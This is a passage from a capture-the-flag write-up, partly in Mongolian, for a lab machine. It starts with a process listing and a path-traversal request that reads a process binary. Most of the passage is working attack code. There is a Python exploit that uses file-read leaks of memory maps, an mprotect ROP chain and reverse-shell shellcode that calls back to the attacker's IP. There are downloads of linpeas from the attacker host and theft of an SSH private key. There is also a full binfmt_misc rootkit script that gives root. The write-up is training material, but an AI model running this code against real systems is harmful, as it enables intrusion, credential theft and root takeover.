 S     card0-crtc0   405         0.000000         2    49         0.000000         0.003597         0.000000 0 0 /
 S     card0-crtc1   406         0.000000         2    49         0.000000         0.003386         0.000000 0 0 /
 S     card0-crtc2   407         0.000000         2    49         0.000000         0.003096         0.000000 0 0 /
 S     card0-crtc3   408         0.000000         2    49         0.000000         0.002765         0.000000 0 0 /
 S     card0-crtc4   409         0.000000         2    49         0.000000         0.002965         0.000000 0 0 /
 S     card0-crtc5   410         0.000000         2    49         0.000000         0.002695         0.000000 0 0 /
 S     card0-crtc6   411         0.000000         2    49         0.000000         0.002484         0.000000 0 0 /
 S     card0-crtc7   412         0.000000         2    49         0.000000         0.002435         0.000000 0 0 /
 S        rsyslogd   423    468436.598541       176   120         0.000000        15.178844         0.000000 0 0 /
 S     in:imuxsock   438    468569.565158     41729   120         0.000000      1456.008380         0.000000 0 0 /
 S       in:imklog   439    459624.836862        16   120         0.000000         3.803078         0.000000 0 0 /
 S   rs:main Q:Reg   440    468569.559458     41671   120         0.000000      1326.234113         0.000000 0 0 /
 S           nginx   541    425815.900707         5   120         0.000000         0.860043         0.000000 0 0 /
 S           nginx   543    465475.646747    616996   120         0.000000    141323.361247         0.000000 0 0 /
 S            sshd 31241    410461.163963        32   120         0.000000        32.728368         0.000000 0 0 /
 S            sshd 31249    468578.986207       464   120         0.000000        56.943783         0.000000 0 0 /
 S            bash 31250    413038.940766        89   120         0.000000        34.014433         0.000000 0 0 /
 I    kworker/u4:3 35630    468153.297932       550   120         0.000000        29.587530         0.000000 0 0 /
 I     kworker/1:0 35699    468595.964356     33275   120         0.000000      1341.618264         0.000000 0 0 /
 I     kworker/1:2 35985    468359.826004        15   120         0.000000         0.156181         0.000000 0 0 /

activate_licens

S            task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-------------------------------------------------------------------------------------------------------------
activate_licens   418    446273.871782        30   120         0.000000         9.136912         0.000000 0 0 /

PID -> 418

GET /index.php?page=../../../../../../../../../../proc/418/exe HTTP/1.1
Host: 10.10.11.154
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

burp-s save file хийнэ.

6. Buffer Overflow

burp-s save хийсэн файлаа binary нэртэй болгоод execute хийж үзэв:

chmod +x binary
./binary 1337
[+] starting server listening on port 1337
[+] listening ..
#!/usr/bin/env python3  
from pwn import *

# Connect to the copy of the binary that was started locally on port 1337.
r = remote("127.0.0.1", 1337)
# Presumably attaches gdb to the local process on the other end of the
# connection; the gdb session output follows on this page.
gdb.attach(r)  # debug in gdb
(No debugging symbols found in /lib/x86_64-linux-gnu/libsqlite3.so.0)
Reading symbols from /lib/x86_64-linux-gnu/libc.so.6...
Reading symbols from /usr/lib/debug/.build-id/54/eef5ce96cf37cb175b0d93186836ca1caf470c.debug...
Reading symbols from /lib/x86_64-linux-gnu/libm.so.6...
Reading symbols from /usr/lib/debug/.build-id/e9/d2c06479b13dd3cfa78d714d11dccf6fcbee51.debug...
Reading symbols from /lib/x86_64-linux-gnu/libpthread.so.0...
Reading symbols from /usr/lib/debug/.build-id/50/18237bbf012b4094027fd0b96fc22a24496ea4.debug...
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Reading symbols from /lib/x86_64-linux-gnu/libdl.so.2...
Reading symbols from /usr/lib/debug/.build-id/11/8b90161526d181807818c459baee841993795b.debug...
Reading symbols from /lib64/ld-linux-x86-64.so.2...
Reading symbols from /usr/lib/debug/.build-id/32/438eb3b034da54caf58c7a65446639f7cfe274.debug...
--Type <RET> for more, q to quit, c to continue without paging--c
0x00007f17a957de8e in __GI___libc_read (fd=4, buf=0x7ffc84813adc, nbytes=4) at ../sysdeps/unix/sysv/linux/read.c:26
26      ../sysdeps/unix/sysv/linux/read.c: No such file or directory.
(gdb) 

Script.py nc -vlnp 9001 local ip -тай ажилууллвал netcat

nc -vlnp 9001

python script

python3 script.py 10.10.14.58 9001
#!/usr/bin/env python  
  
from pwn import *  
import sys,re,requests,socket  
  
IP="10.10.11.154"  
  
def usage():
    """Print the expected command line (local IP, local port) and exit."""
    script_name = sys.argv[0]
    message = f"Usage: {script_name} <LOCAL IP> <LOCAL PORT>"
    print(message)
    exit()
  
# download file and save to /tmp  
def get_file(path):
    """Fetch `path` through the target's `page` query parameter and save it.

    The response body is written unmodified to /tmp/<last component of path>,
    and that local path is returned.

    The request works only because index.php hands back the raw content of
    whatever file the `page` parameter names; that unvalidated parameter is
    the flaw everything else in this script depends on.
    """
    # allow_redirects=False: presumably so that a redirect answer is not
    # silently followed and saved in place of the requested file.
    r = requests.get(f"http://{IP}/index.php?page={path}", allow_redirects=False)
    # NOTE(review): the local name is predictable and lives in a shared /tmp,
    # and r.status_code is never checked, so an error page would be stored as
    # if it were the requested file.
    lpath = f"/tmp/{path.split('/')[-1]}"
    with open(lpath,"wb") as f:
        f.write(r.content)
    return lpath
  
# find process id  
def get_pid():
    """Return the PID (as a string) of the licence service.

    Reads /proc/sched_debug through the `page` parameter and takes the number
    that follows the task name "activate_licens", the truncated form in which
    the service appears in the sched_debug listing on this page.
    """
    r = requests.get(f"http://{IP}/index.php?page=/proc/sched_debug", allow_redirects=False)
    # NOTE(review): re.search returns None when the task is absent, so
    # .group(1) raises AttributeError instead of returning a falsy value; the
    # `if not pid` check in main() is therefore never the path taken.
    # The pattern is also a non-raw string containing "\s".
    pid = re.search("activate_licens\s+([0-9]+)",r.text).group(1)
    print(f"[+] activate_license running @ PID {pid}")
    return pid
  
# extract base addresses from /proc/PID/maps  
def get_addresses(pid):
    """Read /proc/<pid>/maps through the `page` parameter and extract mappings.

    Returns a 6-tuple (libc_base, libc_path, libsqlite_base, libsqlite_path,
    stack_base, stack_end). Bases and stack bounds are ints parsed from the hex
    range at the start of the matched line; each path is the last
    space-separated field of that line.

    Being able to read this file over HTTP is an address leak: it reveals the
    randomized load addresses that ASLR is meant to keep unknown.
    """
    r = requests.get(f"http://{IP}/index.php?page=/proc/{pid}/maps", allow_redirects=False)
    # With re.M, ^...$ matches one whole line; re.search yields the first line
    # containing the name. Presumably that is the lowest mapping of the
    # library (maps is expected to be address-ordered) - TODO confirm.
    # NOTE(review): each pattern is searched twice, and a missing line makes
    # .group(0) raise AttributeError.
    libc_base = int(re.search("^.*libc.*$", r.text, re.M).group(0).split("-")[0], 16)
    libc_path = re.search("^.*libc.*$", r.text, re.M).group(0).split(" ")[-1]
    libsqlite_base = int(re.search("^.*libsqlite.*$", r.text, re.M).group(0).split("-")[0], 16)
    libsqlite_path = re.search("^.*libsqlite.*$", r.text, re.M).group(0).split(" ")[-1]
    # "[stack]" line: "<start>-<end> perms ..." -> start and end of the range.
    stack_base = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[0], 16)
    stack_end = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[1].split()[0], 16)
    return libc_base, libc_path,libsqlite_base, libsqlite_path, stack_base, stack_end
  
  
def main():
    """Run the whole sequence against the host in IP.

    Reads the local IP and port from sys.argv, looks up the service PID and its
    memory map through the file-read parameter, downloads the two libraries,
    builds the payload and POSTs it to activate_license.php. Returns None.
    """
    if len(sys.argv) < 3:
        usage()

    try:
        # 4-byte packed IPv4 address and 2-byte big-endian port, the form in
        # which they are spliced into the shellcode below.
        ip = socket.inet_aton(sys.argv[1])
        # NOTE(review): doubled assignment (`port = port = ...`), harmless.
        # `struct` is not imported by name in this file; presumably it comes
        # in through `from pwn import *` - confirm.
        port =  port=struct.pack(">H",int(sys.argv[2]))
    except:
        # NOTE(review): a bare except also catches KeyboardInterrupt/SystemExit.
        print(f"[-] Invalid arguments")
        usage()

    # Shellcode     msfvenom -p linux/x64/shell_reverse_tcp LHOST=ip LPORT=port -f py
    shellcode =  b""
    shellcode += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48"
    shellcode += b"\x97\x48\xb9\x02\x00"   + port  +  ip +   b"\x51\x48"
    shellcode += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e"
    shellcode += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58"
    shellcode += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48"
    shellcode += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"

    # search PID with LFI
    pid = get_pid()
    # NOTE(review): get_pid() either returns a matched, non-empty string or
    # raises, so this branch is not reached as written.
    if not pid:
        print(f"[-] Could not find PID for activate_license")
        exit()

    # search addresses in /proc/PID/maps
    # Every absolute address used below comes from this leak; without a
    # readable maps file the randomized bases would be unknown.
    libc_base, libc_path, libsqlite_base, libsqlite_path, stack_base, stack_end = get_addresses(pid)
    # calc sizeof(stack) for mprotect
    stack_size = stack_end - stack_base     # 0x21000

    context.clear(arch='amd64')
    libc = ELF(get_file(libc_path),checksec=False)              # download libc
    libc.address = libc_base
    libsql = ELF(get_file(libsqlite_path),checksec=False)       # download libsqlite
    libsql.address = libsqlite_base
    rop = ROP([libc, libsql])

    # Hard-coded number of filler bytes placed before the first chain entry;
    # how it was measured is not shown on this page.
    offset = 520

    # search ROP Gadgets
    mprotect = libc.symbols['mprotect']     # 0xf8c20           readelf -s libc.so.6 | grep mprotect
    pop_rdi = rop.rdi[0]                    # 0x26796           ropper -f libc.so.6 --search "pop rdi"
    pop_rsi = rop.rsi[0]                    # 0x2890f           ropper -f libc.so.6 --search "pop rsi"
    pop_rdx = rop.rdx[0]                    # 0xcb1cd           ropper -f libc.so.6 --search "pop rdx"
    jmp_rsp = rop.jmp_rsp[0]                # 0xd431d           ropper -f libsqlite3.so.0.8.6 --search "jmp rsp"

    payload = b'A' * offset
    # The chain's single purpose is mprotect(stack_base, stack_size, 7), i.e.
    # making the stack mapping executable. A service sandbox that refuses
    # mappings becoming executable (for example systemd's
    # MemoryDenyWriteExecute=) would presumably make this call fail - confirm
    # for this service before relying on it.
    #int mprotect(void *addr, size_t len, int prot);
    payload += p64(pop_rdi) + p64(stack_base)       # addr = Begin of Stack
    payload += p64(pop_rsi) + p64(stack_size)       # len = size of Stack
    payload += p64(pop_rdx) + p64(7)                # prot = Permission 7 -> rwx
    payload += p64(mprotect)                        # call mprotect

    payload += p64(jmp_rsp)                         # jmp rsp
    payload += shellcode                            # add shellcode

    # File Upload beta.html
    # Sent as the multipart field "licensefile"; the response is not inspected.
    r = requests.post(f"http://{IP}/activate_license.php", files = { "licensefile": payload } )
     
  
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()

shell balance:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
wget http://10.10.14.58:8000/linpeas.sh
chmod +x linpeas.sh

var/www/html дотор symlink үүсгээд

ln -s /home/dev/.ssh/id_rsa /var/www/html

үүссэн сүүлийн backup файл-г tmp дотор unzip хийгээд харвал id_rsa байгаа.

# Machine VM
python3 -m http.server 900
# Local VM
wget 10.10.11.154:9001/id_rsa
chmod 600 id_rsa
sh -i id_rsa dev@10.10.11.154

user.txt

3ff5b1*******

7. Privilege escalation

cd /proc/sys/fs/binfmt_misc
dev@retired:/proc/sys/fs/binfmt_misc$ ls -lha
total 0
drwxr-xr-x 2 root root 0 Jul 10 21:40 .
dr-xr-xr-x 1 root root 0 Jul 10 21:40 ..
-rw-r--r-- 1 root root 0 Jul 10 21:40 EMUEMU
--w------- 1 root root 0 Jul 10 21:40 register
-rw-r--r-- 1 root root 0 Jul 10 21:40 status

EMUEMU

enabled
interpreter /usr/bin/emuemu
flags: 
offset 0
magic 13374f53545249434800524f4d00

Status

dev@retired:/proc/sys/fs/binfmt_misc$ cat status 
enabled

binfmt_misc Бэлэн toolkit ашиглах:

git clone https://github.com/plcp/binfmt_misc
cd binfmt_misc
./binfmt_rootkit --help
Usage: ./binfmt_rootkit
    Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
    note that it must be enforced by any other mean before your try this, for
    example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave
    is thinking that you are fixing his problem.

not_writeable - коммент хийнэ, register руу хандаж болохгүй болохоор.

# Registration line in binfmt_misc "register" syntax, with '_' as the field
# delimiter: name, type M (magic), empty offset, magic, empty mask,
# interpreter path, flags OC.
binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
# NOTE(review): fixed, predictable file name in a shared /tmp.
echo "$binfmt_line" > /tmp/temp.txt

# The line is fed to reg_helper on stdin instead of being written to
# $mountpoint/register directly.
cat /tmp/temp.txt | /usr/lib/emuemu/reg_helper

exec "$target"

source

#!/bin/bash

# Directory searched for a set-uid executable (see pick_suid).
readonly searchsuid="/bin/"
# Where binfmt_misc is mounted; "register" and the per-format entries live here.
readonly mountpoint="/proc/sys/fs/binfmt_misc"
# Name the script was invoked as, used in the help text.
readonly exe="$0"


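# Print all arguments as one line on stderr.
# Arguments: the message words, joined with single spaces.
# Outputs:   the message on stderr, nothing on stdout.
warn()
{
    # A fixed printf format keeps the message intact: no word splitting, no
    # glob expansion of characters such as '*', and a leading "-n" or "-e" is
    # printed instead of being taken as an echo option.
    printf '%s\n' "$*" 1>&2
}

# Print a message on stderr and terminate the script.
# Arguments: the message words.
# Exit status: 255, which is what the previous `exit -1` yields in bash.
die()
{
    warn "$@"
    exit 255
}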

# Show the help text on stderr, then leave with status 1.
# Globals: exe (read) - name the script was invoked as.
usage()
{
    cat <<EOF >&2
Usage: $exe
    Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
    note that it must be enforced by any other mean before your try this, for
    example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave is
    thinking that you are fixing his problem.
EOF
    exit 1
}

# function not_writeable()
# {
# 	test ! -w "$mountpoint/register"
# }

# Print one set-uid executable found under a directory.
# Arguments: $1 - directory to search.
# Outputs:   the last path find(1) reports, or nothing when there is none.
# NOTE(review): find's output is not sorted, so "last" is whatever order the
# directory traversal yields. The same find expression, without the tail, is
# also a quick inventory of set-uid files for an audit.
function pick_suid()
{
	find "$1" -perm -4000 -executable \
	    | tail -n 1
}

# Print the first $2 bytes of file $1, with every NUL byte rewritten as the
# four-character text \x00.
# Arguments: $1 - file to read; $2 - number of bytes.
# Returns:   non-zero, with no output, when $1 does not exist or $2 contains
#            no digit; otherwise the status of the dd | sed pipeline.
# NOTE(review): the =~ pattern is unanchored, so any $2 that merely contains a
# digit passes the test and dd is left to reject a malformed count.
function read_magic()
{
    [[ -e "$1" ]] && \
    [[ "$2" =~ [[:digit:]]+ ]] && \
    dd if="$1" bs=1 count="$2" status=none \
        | sed -e 's-\x00-\\x00-g'
}

# Any argument at all just prints the help text.
[[ -n "$1" ]] && usage

# NOTE(review): not_writeable is commented out above, so this call fails with
# "command not found" (visible in the run output on this page) and, because of
# the &&, die is never reached: the writability check is effectively skipped.
not_writeable && die "Error: $mountpoint/register is not writeable"

# Choose the set-uid binary whose leading bytes become the match pattern.
target="$(pick_suid "$searchsuid")"
test -e "$target" || die "Error: Unable to find a suid binary in $searchsuid"

# First 126 bytes of that binary (NULs escaped), used as the magic field.
binfmt_magic="$(read_magic "$target" "126")"
test -z "$binfmt_magic" && die "Error: Unable to retrieve a magic for $target"

# mktemp -u only prints a name and creates nothing; it serves as the format name.
fmtname="$(mktemp -u XXXX)"
# Empty temp file that the compiler output below overwrites.
fmtinterpr="$(mktemp)"

# Build the interpreter binary from the inline C source. The here-doc
# delimiter is unquoted, so $fmtinterpr, $mountpoint and $fmtname are
# substituted by the shell before gcc sees the text, and <<- strips the
# leading tabs.
# The C program unlinks its own file, writes "-1" to the format's entry under
# $mountpoint, calls setuid(0), prints the real and effective uid, and then
# execs /bin/sh.
# NOTE(review): the fopen() and getpwuid() results are used without a NULL
# check, and gcc's exit status is not tested.
gcc -o "$fmtinterpr" -xc - <<- __EOF__
	#include <stdlib.h>
	#include <unistd.h>
	#include <stdio.h>
	#include <pwd.h>

	int main(int argc, char *argv[])
	{
		// remove our temporary file
		unlink("$fmtinterpr");

		// remove the unused binary format
		FILE* fmt = fopen("$mountpoint/$fmtname", "w");
		fprintf(fmt, "-1\\n");
		fclose(fmt);

		// MOTD
		setuid(0);
		uid_t uid = getuid();
		uid_t euid = geteuid();
		struct passwd *pw = getpwuid(uid);
		struct passwd *epw = getpwuid(euid);
		fprintf(stderr, "uid=%u(%s) euid=%u(%s)\\n",
			uid,
			pw->pw_name,
			euid,
			epw->pw_name);

		// welcome home
		char* sh[] = {"/bin/sh", (char*) 0};
		execvp(sh[0], sh);
		return 1;
	}
__EOF__

chmod a+x "$fmtinterpr"

# Presumably the original registration step (a direct write to register),
# left disabled here:
# binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
# echo "$binfmt_line" > "$mountpoint"/register

# exec "$target"

# Changes
# Registration line in binfmt_misc "register" syntax with '_' as the field
# delimiter: name, type M (match by magic), empty offset, magic, empty mask,
# interpreter, flags OC. The C flag makes the kernel compute credentials from
# the matched binary rather than from the interpreter, which is why a
# set-uid-root target leaves the interpreter running as root.
binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
# NOTE(review): fixed, predictable file name in a shared /tmp.
echo "$binfmt_line" > /tmp/temp.txt

# The line goes to reg_helper on stdin. Presumably the helper writes it to
# $mountpoint/register with privileges the calling user lacks (register is
# writable by root only in the listing on this page); the helper itself is not
# shown. For a defender, this is the root cause: an unprivileged path to
# register, plus any unexpected entry under $mountpoint, is what to audit.
cat /tmp/temp.txt | /usr/lib/emuemu/reg_helper

# Executing the set-uid target now matches the new format, so the kernel
# starts the registered interpreter instead.
exec "$target"

Хуулах

# Local Machine
python3 -m http.server
# VM Machine
wget http://10.10.14.58:8000/binfmt_rootkit
chmod +x binfmt_rootkit

./binfmt_rootkit run хийвэл

dev@retired:~$ chmod +x binfmt_rootkit
dev@retired:~$ ./binfmt_rootkit
./binfmt_rootkit: line 52: not_writeable: command not found
uid=0(root) euid=0(root)

root.txt

d34f6a*******